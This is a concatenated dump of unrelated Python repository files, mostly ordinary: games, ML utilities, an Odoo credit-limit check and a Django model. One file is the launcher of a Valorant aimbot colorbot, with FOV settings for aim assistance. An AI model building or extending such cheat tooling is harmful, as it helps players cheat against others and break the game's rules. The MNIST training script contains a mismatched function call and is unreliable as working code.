elif(inp=='b'):\n if(char_flag==0):\n v1.king_big_attack()\n elif(char_flag==1):\n 
queen_big_attack_flag = 1\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='r' and char_flag==0):\n if(t-v1.player.prev_rage_time>=100):\n v1.player.rage = 1\n v1.player.prev_rage_time = t\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='h' and char_flag==0):\n if(t-v1.player.prev_heal_time>=100):\n v1.player.hp = int(v1.player.hp*1.5)\n if(v1.player.hp>KING_HEALTH):\n v1.player.hp = KING_HEALTH\n for barbarian in v1.barbarians:\n barbarian.hp = int(barbarian.hp*1.5)\n if(barbarian.hp>BARBARIAN_HEALTH):\n barbarian.hp = BARBARIAN_HEALTH\n v1.player.prev_heal_time = t\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='1' or inp=='2' or inp=='3'):\n v1.spawn_barbarian(int(inp))\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='4' or inp=='5' or inp=='6'):\n v1.spawn_archer(int(inp)-3)\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='7' or inp=='8' or inp=='9'):\n v1.spawn_balloon(int(inp)-6)\n v1.printVillage(t)\n print(\"\\n\\n\")\n elif(inp=='k'):\n for i in range(20):\n v1.player.hp -= 10\n v1.printVillage(t)\n print(\"\\n\\n\")\n time.sleep(1)\n if(inp=='u'):\n v1.printVillage(t)\n print(\"\\n\\n\")\n v1.canon_attack()\n v1.wizard_attack()\n \n i=0\n lim=2\n if(v1.player.rage==0):\n lim=1\n for i in range(lim):\n for barbarian in v1.barbarians:\n if(barbarian.hp<=0):\n continue\n if(barbarian.min_distance_object==None):\n v1.barbarian_target_set(barbarian)\n if(barbarian.target != (-1, -1)):\n v1.barbarian_target_set(barbarian)\n if(barbarian.target[0]>0):\n v1.barbarian_move(barbarian, 1,0)\n barbarian.target = (barbarian.target[0]-1, barbarian.target[1])\n elif(barbarian.target[0]<0):\n v1.barbarian_move(barbarian, -1,0)\n barbarian.target = (barbarian.target[0]+1, barbarian.target[1])\n elif(barbarian.target[1]>0):\n v1.barbarian_move(barbarian, 0,1)\n barbarian.target = (barbarian.target[0], barbarian.target[1]-1)\n elif(barbarian.target[1]<0):\n v1.barbarian_move(barbarian, 0,-1)\n barbarian.target = (barbarian.target[0], barbarian.target[1]+1)\n if(barbarian.target==(0,0)):\n barbarian.target = (-1, -1)\n v1.printVillage(t)\n \n elif(barbarian.min_distance_object != None):\n barbarian.min_distance_object.hp -= BARBARIAN_DAMAGE\n if(barbarian.min_distance_object.hp<=0):\n barbarian.min_distance_object = None\n v1.barbarian_target_set(barbarian)\n\n for archer in v1.archers:\n if(archer.hp<=0):\n continue\n if(archer.min_distance_object==None):\n v1.archer_target_set(archer)\n if(archer.target != (-1, -1)):\n v1.archer_target_set(archer)\n if(archer.target[0]>8):\n v1.archer_move(archer, 2,0)\n archer.target = (archer.target[0]-2, archer.target[1])\n elif(archer.target[0]<-8):\n v1.archer_move(archer, -2,0)\n archer.target = (archer.target[0]+2, archer.target[1])\n elif(archer.target[1]>8):\n v1.archer_move(archer, 0,2)\n archer.target = (archer.target[0], archer.target[1]-2)\n elif(archer.target[1]<-8):\n v1.archer_move(archer, 0,-2)\n archer.target = (archer.target[0], archer.target[1]+2)\n if(archer.target<=(8,8) and archer.target>=(-8,-8)):\n archer.target = (-1, -1)\n v1.printVillage(t)\n \n elif(archer.min_distance_object != None):\n archer.min_distance_object.hp -= ARCHER_DAMAGE\n if(archer.min_distance_object.hp<=0):\n archer.min_distance_object = None\n v1.archer_target_set(archer)\n \n for balloon in v1.balloons:\n if(balloon.hp<=0):\n continue\n if(balloon.min_distance_object==None):\n v1.balloon_target_set(balloon)\n if(balloon.target != (-1, -1)):\n v1.balloon_target_set(balloon)\n if(balloon.target[0]>0):\n v1.balloon_move(balloon, 1,0)\n 
balloon.target = (balloon.target[0]-1, balloon.target[1])\n elif(balloon.target[0]<0):\n v1.balloon_move(balloon, -1,0)\n balloon.target = (balloon.target[0]+1, balloon.target[1])\n elif(balloon.target[1]>0):\n v1.balloon_move(balloon, 0,1)\n balloon.target = (balloon.target[0], balloon.target[1]-1)\n elif(balloon.target[1]<0):\n v1.balloon_move(balloon, 0,-1)\n balloon.target = (balloon.target[0], balloon.target[1]+1)\n if(balloon.target==(0,0)):\n balloon.target = (-1, -1)\n v1.printVillage(t)\n \n elif(balloon.min_distance_object != None):\n balloon.min_distance_object.hp -= BALLOON_DAMAGE\n if(balloon.min_distance_object.hp<=0):\n balloon.min_distance_object = None\n v1.balloon_target_set(balloon)\n\n","repo_name":"benpaul2002/Clash_of_Clans","sub_path":"replay.py","file_name":"replay.py","file_ext":"py","file_size_in_byte":7586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12673111262","text":"import pygame\nimport random\n\n# initialize pygame\npygame.init()\n\n# game window\nWINDOW_WIDTH = 900\nWINDOW_HEIGHT = 700\nwindow = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\n\n# colors\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nGREY = (128, 128, 128)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nCLEAR_BLUE = (52, 198, 235)\nASPHALT = (99, 96, 110)\nBEACH = (166, 144, 116)\n\n# player and player's movement speed\nPLAYER_WIDTH = 100\nPLAYER_HEIGHT = 100\nplayer_x = (WINDOW_WIDTH - PLAYER_WIDTH) // 2\nplayer_y = WINDOW_HEIGHT - PLAYER_HEIGHT - 10\nplayer_speed = 5\n\n# set up the font for displaying the score\nfont = pygame.font.SysFont(None, 30)\n\n# score\nscore = 0\n\n# obstacle and obstacle's movement speed\nobstacle_plane_width = 50\nobstacle_plane_height = 50\nobstacle_boat_width = obstacle_plane_width + 10\nobstacle_boat_height = obstacle_plane_height + 10\nobstacle_plane_x = random.randint(0, WINDOW_WIDTH - obstacle_plane_width)\nobstacle_plane_y = -obstacle_plane_height\nobstacle_boat_x = random.randint(0, WINDOW_WIDTH - obstacle_boat_width)\nobstacle_boat_y = -obstacle_boat_height\nobstacle_speed_y = 3\n\ngame_over = False","repo_name":"Viciiiz/plane-tower-game","sub_path":"my_vars/my_vars.py","file_name":"my_vars.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20231406010","text":"from typing import Iterable\n\nfrom santa_factory.dashboard import Dashboard\nfrom santa_factory.elf import Elf\nfrom santa_factory.elf_team import ElfTeam\nfrom santa_factory.garage import Garage\nfrom santa_factory.gift import GiftFactory\n\n\nclass SantaFactory:\n def __init__(self, gift_factory: GiftFactory, elves: Iterable[Elf],\n garage: Garage, dashboard: Dashboard):\n self.gift_factory = gift_factory\n self.garage = garage\n self.dashboard = dashboard\n self.elf_team = ElfTeam(elves)\n # Monitoring\n for elf in self.elf_team.elves:\n self.dashboard.monitor(elf)\n for sledge in self.garage.sledges:\n self.dashboard.monitor(sledge)\n\n async def run(self):\n \"\"\"Brings to life this little world\"\"\"\n self.dashboard.start()\n async for gift in self.gift_factory:\n await self.elf_team.handle_gift(gift, self.garage)\n","repo_name":"wyfo/santa_factory","sub_path":"santa_factory/santa_factory.py","file_name":"santa_factory.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} 
+{"seq_id":"15126488103","text":"import pyautogui, ctypes, os\nfrom colorbot import Colorbot\nfrom settings import Settings\n\nclass Main:\n def __init__(self):\n self.settings = Settings()\n self.monitor = pyautogui.size()\n self.CENTER_X, self.CENTER_Y = self.monitor.width // 2, self.monitor.height // 2\n self.XFOV = self.settings.get_int('AIMBOT', 'xFov')\n self.YFOV = self.settings.get_int('AIMBOT', 'yFov')\n self.Colorbot = Colorbot(self.CENTER_X - self.XFOV // 2, self.CENTER_Y - self.YFOV // 2, self.XFOV, self.YFOV)\n\n def better_cmd(self, width, height):\n hwnd = ctypes.windll.kernel32.GetConsoleWindow()\n if hwnd:\n style = ctypes.windll.user32.GetWindowLongW(hwnd, -16)\n style &= -262145\n style &= -65537\n ctypes.windll.user32.SetWindowLongW(hwnd, -16, style)\n STD_OUTPUT_HANDLE_ID = ctypes.c_ulong(4294967285)\n windll = ctypes.windll.kernel32\n handle = windll.GetStdHandle(STD_OUTPUT_HANDLE_ID)\n rect = ctypes.wintypes.SMALL_RECT(0, 0, width - 1, height - 1)\n windll.SetConsoleScreenBufferSize(handle, ctypes.wintypes._COORD(width, height))\n windll.SetConsoleWindowInfo(handle, ctypes.c_int(True), ctypes.pointer(rect))\n\n def info(self):\n os.system('cls')\n print('github.com/kaanosu/ValorantArduinoColorbot\\n')\n print('Enemy Outline Color: Purple')\n\n def run(self):\n self.better_cmd(120, 30)\n self.info()\n self.Colorbot.listen()\n\nif __name__ == '__main__':\n Main().run()","repo_name":"kaanosu/ValorantArduinoColorbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"33343493598","text":"from collections import OrderedDict, defaultdict\nfrom typing import List\n\nfrom deeplake.util.hash import hash_str_to_int32\nfrom deeplake.util.exceptions import EmptyTensorError\nfrom deeplake.client.log import logger\nimport numpy as np\nimport deeplake\n\n\ndef convert_to_idx(samples, class_names: List[str]):\n class_idx = {class_names[i]: i for i in range(len(class_names))}\n\n def convert(samples):\n idxs = []\n additions = []\n for sample in samples:\n if isinstance(sample, np.ndarray):\n sample = sample.tolist()\n if isinstance(sample, str):\n idx = class_idx.get(sample)\n if idx is None:\n idx = len(class_idx)\n class_idx[sample] = idx\n additions.append((sample, idx))\n idxs.append(idx)\n elif isinstance(sample, list):\n idxs_, additions_ = convert(sample)\n idxs.append(idxs_)\n additions.extend(additions_)\n else:\n idxs.append(sample)\n return idxs, additions\n\n return convert(samples)\n\n\ndef convert_to_hash(samples, hash_label_map):\n if isinstance(samples, np.ndarray):\n samples = samples.tolist()\n if isinstance(samples, list):\n return [convert_to_hash(sample, hash_label_map) for sample in samples]\n else:\n if isinstance(samples, str):\n hash_ = hash_str_to_int32(samples)\n hash_label_map[hash_] = samples\n else:\n hash_ = samples\n return hash_\n\n\ndef convert_hash_to_idx(hashes, hash_idx_map):\n if isinstance(hashes, list):\n return [convert_hash_to_idx(hash, hash_idx_map) for hash in hashes]\n else:\n try:\n return hash_idx_map[hashes]\n except KeyError:\n return hashes\n\n\ndef convert_to_text(inp, class_names: List[str], return_original=False):\n if isinstance(inp, np.integer):\n idx = int(inp)\n if idx < len(class_names):\n return class_names[idx]\n return idx if return_original else None\n return [convert_to_text(item, class_names) for item in inp]\n\n\ndef sync_labels(\n ds, label_temp_tensors, hash_label_maps, 
num_workers, scheduler, verbose=True\n):\n ds = ds.root\n hl_maps = defaultdict(OrderedDict)\n for map in hash_label_maps:\n for tensor in map:\n hl_maps[tensor].update(map[tensor])\n hash_label_maps = hl_maps\n\n @deeplake.compute\n def class_label_sync(\n hash_tensor_sample,\n samples_out,\n label_tensor: str,\n hash_idx_map,\n ):\n try:\n hashes = hash_tensor_sample.numpy().tolist()\n idxs = convert_hash_to_idx(hashes, hash_idx_map)\n except EmptyTensorError:\n idxs = None\n samples_out[label_tensor].append(idxs)\n\n for tensor, temp_tensor in label_temp_tensors.items():\n if len(ds[temp_tensor]) == 0:\n ds.delete_tensor(temp_tensor, large_ok=True)\n else:\n try:\n target_tensor = ds[tensor]\n hash_label_map = hash_label_maps[temp_tensor]\n class_names = target_tensor.info.class_names\n new_labels = [\n label\n for label in hash_label_map.values()\n if label not in class_names\n ]\n if verbose:\n N = len(class_names)\n for i in range(len(new_labels)):\n logger.info(\n f\"'{new_labels[i]}' added to {tensor}.info.class_names at index {N + i}\"\n )\n class_names.extend(new_labels)\n label_idx_map = {class_names[i]: i for i in range(len(class_names))}\n hash_idx_map = {\n hash: label_idx_map[hash_label_map[hash]] for hash in hash_label_map\n }\n target_tensor.info.is_dirty = True\n target_tensor.meta._disable_temp_transform = True\n target_tensor.meta.is_dirty = True\n\n logger.info(\"Synchronizing class labels...\")\n class_label_sync(label_tensor=tensor, hash_idx_map=hash_idx_map).eval(\n ds[temp_tensor],\n ds,\n progressbar=True,\n check_lengths=False,\n skip_ok=True,\n )\n target_tensor.meta._disable_temp_transform = False\n finally:\n ds.delete_tensor(temp_tensor, large_ok=True)\n","repo_name":"activeloopai/deeplake","sub_path":"deeplake/util/class_label.py","file_name":"class_label.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","stars":7141,"dataset":"github-code","pt":"81"} +{"seq_id":"27211999135","text":"import numpy as np\nimport pandas as pd\nimport pickle\nimport datetime\nimport os\n\nEPOCHS = 30\nLEARNING_RATE = 0.00003\nLAYERS = [784, 30, 10]\n\nLOAD_WEIGHTS = False\n\nSAVE_NAME = '3_layers'\n\n# A function that loads mnist data into a pandas dataframe\ndef load_mnist_data():\n # Load the data\n train = pd.read_csv('data/mnist_train.csv')\n test = pd.read_csv('data/mnist_test.csv')\n\n # Shuffle the data\n train = train.sample(frac=1).reset_index(drop=True)\n test = test.sample(frac=1).reset_index(drop=True)\n\n # Split the data into X and y for train, test and validation\n X_train = train.drop('label', axis=1).to_numpy()\n y_train = train['label'].to_numpy()\n\n X_test = test.drop('label', axis=1)\n y_test = test['label']\n\n X_val = X_test[:5000].to_numpy()\n y_val = y_test[:5000].to_numpy()\n\n X_test = X_test[5000:].to_numpy()\n y_test = y_test[5000:].to_numpy()\n\n # Return the data\n return (X_train, y_train), (X_test, y_test), (X_val, y_val)\n\nclass NeuralNetwork:\n def __init__(self, layers, learning_rate=0.01):\n self.layers = layers\n self.learning_rate = learning_rate\n\n self.weights, self.biases = self.initialize_weights()\n\n def initialize_weights(self):\n weights = []\n biases = []\n \n # Randomly initialize the weights\n # We use a normal distribution with mean 0 and standard deviation 1\n for i in range(len(self.layers) - 1):\n input_size = self.layers[i]\n output_size = self.layers[i + 1]\n\n # Adding weighs and biases for the current layer\n biases.append(np.random.normal(loc = 0, scale = 1.0, size = (1, 
output_size)))\n weights.append(np.random.normal(loc = 0, scale = 1.0, size = (input_size, output_size)))\n\n return weights, biases\n\n # Takes the input X and returns the output of the network\n # Forward pass uses ReLU on all layers except the last one, which uses softmax\n # Input: (batch_size, 784)\n def forward(self, X : np.ndarray, return_layer_activations : bool = False) -> np.ndarray:\n # Reshaping if there is no batch dimension\n if len(X.shape) == 1:\n X = X.reshape(1, -1)\n\n if X.shape[1] != 784:\n raise ValueError('The input must be of shape (batch_size, 784)')\n if len(X.shape) != 2:\n raise ValueError('The input must be of shape (batch_size, 784) or (784)')\n \n # Returning layer activations if requested. Used in backpropagation typically\n if return_layer_activations: \n layer_activations = []\n \n # Forward pass\n for i in range(len(self.layers) - 1):\n if return_layer_activations: layer_activations.append(X)\n\n X = np.dot(X, self.weights[i]) + self.biases[i]\n\n # TODO: Implement dropout during training\n\n # ReLU for all layers except the last one\n if i != len(self.layers) - 2:\n # Normalize the data\n mean = np.array(np.mean(X, axis = 1)).reshape(-1, 1)\n std = np.array(np.std(X, axis = 1)).reshape(-1, 1)\n normalized_X = np.divide(np.subtract(X, mean), std)\n\n # ReLU\n X = np.maximum(normalized_X, 0)\n else: # Softmax for the last layer\n X = self.__softmax(X)\n\n # Return the layer activations if requested\n if return_layer_activations:\n return X, layer_activations\n \n return X\n\n # Takes the input X and the target y, and returns\n # the loss and the gradient of the loss with respect to the weights\n def backward(self, X : np.ndarray, y : np.ndarray) -> tuple[np.ndarray, float]:\n pred, layer_activations = self.forward(X, return_layer_activations = True)\n \n # Calculate the loss\n loss = self.__cross_entropy_loss(pred, y)\n\n weight_gradients = []\n bias_gradients = []\n\n for layer_num in range(len(self.weights) - 1, -1, -1):\n # dL/dW = dL/dA * dA/dZ * dZ/dW\n\n prev_activation = layer_activations[layer_num]\n\n # Final Layer\n if layer_num == len(self.weights) - 1:\n # Change in loss as a function of the weights and biases\n ground_truth = self.__labels_to_one_hot(y)\n activation_j = np.expand_dims(np.transpose(np.squeeze(prev_activation, axis = 0)), axis = 1)\n delta_k = pred - ground_truth\n\n dL_dW = np.matmul(activation_j, delta_k)\n dL_db = delta_k\n else: # Hidden Layers\n # Change in loss as a function of the weights and biases\n a_i = prev_activation\n relu_prime = self.__calculate_relu_derivative(layer_activations[layer_num + 1])\n # dL/dy = sum(dL(j)/dz(j) * W(j+1)) \n W_j_plus_1 = self.weights[layer_num + 1]\n dL_j_dz_j = np.matmul(weight_gradients[-1].transpose(), relu_prime.transpose())\n dL_dy = np.matmul(W_j_plus_1, dL_j_dz_j)\n\n dL_dW = np.matmul(np.transpose(a_i), relu_prime) * np.sum(dL_dy, axis = 1)\n dL_db = relu_prime * np.sum(dL_dy, axis = 1)\n\n weight_gradients.append(dL_dW)\n bias_gradients.append(dL_db)\n \n # Reverse the gradients to match the order of the weights and biases\n weight_gradients = weight_gradients[::-1]\n bias_gradients = bias_gradients[::-1]\n\n # Preform gradient clipping to prevent exploding gradients\n weight_gradients = [np.clip(weight_gradient, -1, 1) for weight_gradient in weight_gradients]\n bias_gradients = [np.clip(bias_gradient, -1, 1) for bias_gradient in bias_gradients]\n\n return loss, (weight_gradients, bias_gradients)\n\n ###########\n # Helpers #\n ###########\n\n def __softmax(self, X : 
np.ndarray) -> np.ndarray:\n return np.exp(X) / np.sum(np.exp(X), axis=1, keepdims=True)\n \n # Cross entropy loss\n def __cross_entropy_loss(self, pred : np.ndarray, y : np.ndarray) -> float:\n if len(y.shape) == 0:\n true_class_prob = np.zeros(shape = (1, 10))\n true_class_prob[0, y] = 1\n else:\n true_class_prob = np.zeros(shape = (y.shape[0], 10))\n true_class_prob[np.arange(y.size), y] = 1\n\n return -np.sum(np.log(pred) * true_class_prob) / true_class_prob.shape[0]\n \n # Derivative of the softmax function\n def __calculate_softmax_derivatve(self, X : np.ndarray) -> np.ndarray:\n softmax_out = self.__softmax(X)\n return softmax_out / (1.0 - softmax_out)\n\n # Derivative of the ReLU function\n def __calculate_relu_derivative(self, X : np.ndarray) -> np.ndarray:\n return np.where(X > 0, 1, 0)\n\n # Derivative of the cross entropy function\n def __calculate_cross_entropy_derivative(self, pred : np.ndarray, y : np.ndarray) -> np.ndarray:\n true_class_prob = self.__labels_to_one_hot(y)\n\n return -true_class_prob / pred\n \n def __labels_to_one_hot(self, y : np.ndarray) -> np.ndarray:\n if len(y.shape) == 0:\n one_hot = np.zeros(shape = (1, 10))\n one_hot[0, y] = 1\n else:\n one_hot = np.zeros(shape = (y.shape[0], 10))\n one_hot[np.arange(y.size), y] = 1\n\n return one_hot\n\ndef train(net : NeuralNetwork, train_data : np.ndarray, val_data : np.ndarray, epochs=10):\n X_train, y_train = train_data\n X_val, y_val = val_data\n\n avg_train_losses = []\n avg_val_losses = []\n\n avg_train_accuracies = []\n avg_val_accuracies = []\n\n # For each epoch\n for epoch in range(1, epochs + 1):\n\n avg_val_loss = get_validation_loss(net, X_val, y_val)\n avg_val_losses.append(avg_val_loss)\n\n val_accuracy = eval(net, val_data)\n avg_val_accuracies.append(val_accuracy)\n\n losses = []\n\n # For each example in the training set\n for i in range(X_train.shape[0]):\n X_batch = np.array(X_train[i])\n y_batch = np.array(y_train[i])\n\n loss, (weight_grad, bias_grad) = net.backward(X_batch, y_batch)\n\n losses.append(loss)\n\n # Updating the weights and biases\n for i in range(len(net.weights)):\n net.weights[i] -= LEARNING_RATE * weight_grad[i]\n net.biases[i] -= LEARNING_RATE * bias_grad[i]\n\n avg_loss = np.mean(losses)\n avg_train_losses.append(avg_loss)\n\n train_accuracy = eval(net, train_data)\n avg_train_accuracies.append(train_accuracy)\n\n print(epoch, avg_loss, avg_val_loss, train_accuracy, val_accuracy)\n\n if epoch % 5 == 0 and epoch != 0:\n save_data(net, avg_train_losses, avg_val_losses)\n\n return net, avg_train_losses, avg_val_losses, avg_train_accuracies, avg_val_accuracies\n\ndef get_validation_loss(net : NeuralNetwork, X_val : np.ndarray, y_val : np.ndarray) -> float:\n losses = []\n\n for i in range(X_val.shape[0]):\n X_batch = np.array(X_val[i])\n y_batch = np.array(y_val[i])\n\n loss, _ = net.backward(X_batch, y_batch)\n losses.append(loss)\n\n return np.mean(losses)\n\n\ndef eval(net : NeuralNetwork, test_data : np.ndarray):\n X_test, y_test = test_data\n\n correct_guesses = 0\n\n for i in range(X_test.shape[0]):\n X_batch = np.array(X_test[i])\n y_batch = np.array(y_test[i])\n\n pred_vector = net.forward(X_batch)\n prediction = pred_vector.argmax()\n\n #print('Prediction:', prediction, 'Actual: ', y_batch)\n\n if prediction == y_batch:\n correct_guesses += 1\n\n return float(correct_guesses) / float(X_test.shape[0])\n\ndef save_data(net, avg_train_losses, avg_val_losses, avg_train_accuracies, avg_val_accuracies):\n # Creating a method for saving everything\n # Create a directory for 
the current run\n run_dir = os.path.join(\"saves\", SAVE_NAME + '_' + start_date_time)\n os.makedirs(run_dir)\n\n # Saving the weights and biases\n with open(os.path.join(run_dir, 'weights.pkl'), 'wb') as f:\n pickle.dump(net.weights, f)\n pickle.dump(net.biases, f)\n\n # Saving the losses in a pandas csv\n df = pd.DataFrame({'train_loss': avg_train_losses, 'val_loss': avg_val_losses, 'train_accuracy': avg_train_accuracies, 'val_accuracy': avg_val_accuracies})\n df.to_csv(os.path.join(run_dir, 'losses.csv'), index=False)\n\ndef main():\n global start_date_time\n start_date_time = str(datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\n\n train_data, test_data, val_data = load_mnist_data()\n\n net = NeuralNetwork(layers = LAYERS)\n\n # Loading saved weights and biases\n if LOAD_WEIGHTS:\n with open('weights.pkl', 'rb') as f:\n weights = pickle.load(f)\n biases = pickle.load(f)\n net.weights = weights\n net.biases = biases\n\n net, avg_train_losses, avg_val_losses, avg_train_accuracies, avg_val_accuracies = train(net, train_data, val_data, epochs = EPOCHS)\n\n save_data(net, avg_train_losses, avg_val_losses)\n\n accuracy_on_test = eval(net, test_data)\n print('Accuracy: ', accuracy_on_test)\n\n'''\nEpoch Train Loss and Val loss of 20 epochs\n1 1.8910248125755844 0.9066598151773069\n2 0.7853883801136732 0.705261561068248\n3 0.6955340516656342 0.6693685850868711\n4 0.6822431915452479 0.6796129016275548\n5 0.7173728657741884 0.747428342082974\n6 0.8274607238245256 0.907169095318536\n7 1.0052239265308296 1.0880439811614062\n8 1.1613310888744866 1.2230937263566783\n9 1.284066508283541 1.338250384763169\n10 1.3958711280865803 1.4437385398300528\n11 1.494520786077842 1.534511693267978\n12 1.5771848213769906 1.6089244242025091\n13 1.6441051550342975 1.6690671529427084\n14 1.6992237664247059 1.718997491143662\n15 1.7443720205997044 1.7595907995988858\n16 1.7818428704069464 1.7945413506939825\n17 1.8148602666607832 1.8261337171909462\n18 1.8453701248460639 1.855368090920725\n19 1.873594312775242 1.8826773416419804\n20 1.9004549753505733 1.9088665722050886\n'''\n\nif __name__ == '__main__':\n main()","repo_name":"nvinden/neural_net_from_scratch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30516424724","text":"import pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ndata = pd.read_csv('diabetes.csv')\r\n\r\n##### Data Cleaning #####\r\n\r\n# In the dataset we are working with, missing data is represented by 0s\r\n# This function replaces missing values in a column with the mean of the non-zero values in the column\r\n# Parameters: columnName, string - the header of the column\r\n# Returns: nothing\r\ndef cleanColumn(columnName):\r\n # Set all 0 entries to pd.NA so we can use pd.df.fillna to quickly replace the missing values\r\n for row in data.index:\r\n if data.loc[row, columnName] == 0:\r\n data.loc[row, columnName] = pd.NA\r\n \r\n data[columnName].fillna(data[columnName].mean(skipna=True), inplace=True)\r\n\r\ncolumnsToClean = {'Glucose', 'BloodPressure', 'SkinThickness', 'Insulin', 'BMI'}\r\n\r\nfor columnName in columnsToClean:\r\n cleanColumn(columnName)\r\n\r\n##### Normalising Data #####\r\n\r\n# Applies Gaussian normalisation to columns\r\n# Parameters: columnName, string - the header of the column\r\n# Returns: nothing\r\ndef normaliseColumn(columnName):\r\n data[columnName] = 
(data[columnName]-data[columnName].mean())/data[columnName].std()\r\n\r\n# Only the feature columns are normalised, the class labels are left as either 1s or 0s\r\nfor columnName in {'Pregnancies','Glucose','BloodPressure','SkinThickness','Insulin','BMI','DiabetesPedigreeFunction','Age'}:\r\n normaliseColumn(columnName)\r\n\r\n##### Test-Train Splitting #####\r\n \r\n# stratify=data['Outcome'] maintains relative frequencies of classes in the train and test data\r\ntrainInstances, testInstances = train_test_split(data, test_size=0.2, shuffle=True, stratify=data['Outcome'])\r\n\r\n# index=False stops a column of row indices from being written to the .csv file\r\ntrainInstances.to_csv('train.csv', index=False)\r\ntestInstances.to_csv('test.csv', index=False)\r\n","repo_name":"UntitledGrub/classifercomp","sub_path":"dataPreparation.py","file_name":"dataPreparation.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20786764758","text":"class RangeDown:\n \"\"\"Iterator from max down to min (both inclusive)\"\"\"\n\n def __init__(self, min1, max1):\n self.current = max1 + 1\n self.min = min1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n self.current -= 1\n if self.current < self.min:\n raise StopIteration\n else:\n return self.current\n\n\nif __name__ == '__main__':\n # Use iter() and next()\n itr = iter(RangeDown(6, 8)) # self.min = 6, self.current = 9 --> b\n\n print(next(itr)) # 8\n print(next(itr)) # 7\n print(next(itr)) # 6\n # print(next(itr)) # StopIteration\n\n # Iterate in for-in loop\n for i in RangeDown(6, 8):\n print(i, end=\" \") # 8 7 6\n print()\n\n # Use __iter__() and __next__()\n itr2 = RangeDown(9, 10).__iter__()\n print(itr2.__next__()) # 10\n print(itr2.__next__()) # 9\n print(itr2.__next__()) # StopIteration","repo_name":"ramanamiracle/PythonTraining","sub_path":"iter_gen_context/itr.py","file_name":"itr.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10755501726","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n\n credit_limit_checked = fields.Boolean(\"Credit Limit Checked\", default=False)\n\n @api.multi\n def action_confirm(self):\n invoice_total = 0\n payment_total = 0\n exceed_amount = 0\n if self.partner_id.credit_limit_applicable:\n delivered_quantity = all(line.product_id.invoice_policy == 'delivery' for line in self.order_line)\n customer_inv = self.env[\"account.invoice\"].search([('partner_id','=', self.partner_id.id), ('state','not in',['draft','cancel']),('type', '=','out_invoice')])\n for inv in customer_inv:\n invoice_total+= inv.amount_total\n customer_payment = self.env[\"account.payment\"].search([('partner_id','=', self.partner_id.id), ('payment_type', '=','inbound'),('state','in',['posted','reconciled'])])\n for pay in customer_payment:\n payment_total+= pay.amount\n if payment_total > invoice_total:\n print (\"else\")\n elif invoice_total > payment_total:\n exceed_amount = (invoice_total + self.amount_total) - payment_total\n if delivered_quantity:\n if exceed_amount > self.partner_id.credit_limit:\n if self.credit_limit_checked == False:\n return {\n \"type\": \"ir.actions.act_window\",\n \"res_model\": \"credit.limit.warning\",\n \"views\": [[False, \"form\"]],\n \"target\": \"new\",\n }\n elif self.credit_limit_checked == 
True:\n self._action_confirm()\n if self.env['ir.config_parameter'].sudo().get_param('sale.auto_done_setting'):\n self.action_done()\n elif exceed_amount < self.partner_id.credit_limit:\n self._action_confirm()\n if self.env['ir.config_parameter'].sudo().get_param('sale.auto_done_setting'):\n self.action_done()\n else:\n raise UserError(_('Select all products with Delivered quantities Invoicing policy'))\n else:\n self._action_confirm()\n if self.env['ir.config_parameter'].sudo().get_param('sale.auto_done_setting'):\n self.action_done()\n return True\n","repo_name":"ItaraTeam0215674595252522566/Team-project","sub_path":"models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"25485866402","text":"from django.db import models\nfrom faker import Faker\n\nfrom groups.models import Group\nfrom .validators import unique_number\n\n\nclass Teachers(models.Model):\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=30)\n age = models.IntegerField()\n phone_number = models.CharField(\n max_length=20,\n validators=[unique_number]\n )\n group = models.ForeignKey(\n Group,\n on_delete=models.SET_NULL,\n null=True,\n related_name='teachers'\n )\n\n def __str__(self):\n return f'{self.first_name} {self.last_name} age: {self.age} phone number: {self.phone_number}'\n\n @staticmethod\n def gen_teachers(count):\n fake = Faker()\n for _ in range(count):\n teach = Teachers(first_name=fake.first_name(),\n last_name=fake.last_name(), age=fake.pyint(25, 75))\n teach.save()\n","repo_name":"ZemiosLemon/django_lms","sub_path":"teachers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25519408098","text":"from PyInquirer import prompt\n\nquestions = [\n {\n 'type': 'list',\n 'name': 'opciones',\n 'message': 'Que deseas ?',\n 'choices': [\n 'Opcion 1',\n 'Opcion 2',\n 'Opcion 3',\n 'Opcion 4',\n 'Opcion 5',\n 'Opcion 6'\n ]\n }\n]\n\nanswers = 